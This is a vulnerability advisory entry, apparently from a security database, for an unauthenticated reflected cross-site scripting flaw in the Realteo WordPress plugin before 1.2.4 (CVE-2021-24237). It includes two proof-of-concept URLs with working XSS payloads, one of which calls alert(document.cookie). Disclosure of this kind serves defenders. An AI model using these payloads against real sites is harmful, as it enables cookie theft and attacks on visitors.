Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitM0zeWPEX-ID:087B27C4-289E-410F-AF74-828A608A4E1E
HistoryMar 31, 2021 - 12:00 a.m.

Realteo < 1.2.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)

2021-03-3100:00:00
m0ze
291
JSON

The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page, leading to an unauthenticated reflected Cross-Site Scripting issue.

https://example.com/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);//%22

https://example.com/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22&search_radius=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22

Related

prion 1
cve 1
wpvulndb 1
nuclei 1
prion
prion
Cross site scripting
2021-04-22 21:15:00
cve
cve
CVE-2021-24237
2021-04-22 21:15:00
wpvulndb
wpvulndb
Realteo < 1.2.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)
2021-03-31 00:00:00
nuclei
nuclei
WordPress Realteo <=1.2.3 - Cross-Site Scripting
2021-06-09 11:11:17
JSON
Related for WPEX-ID:087B27C4-289E-410F-AF74-828A608A4E1E
prion1cve1wpvulndb1nuclei1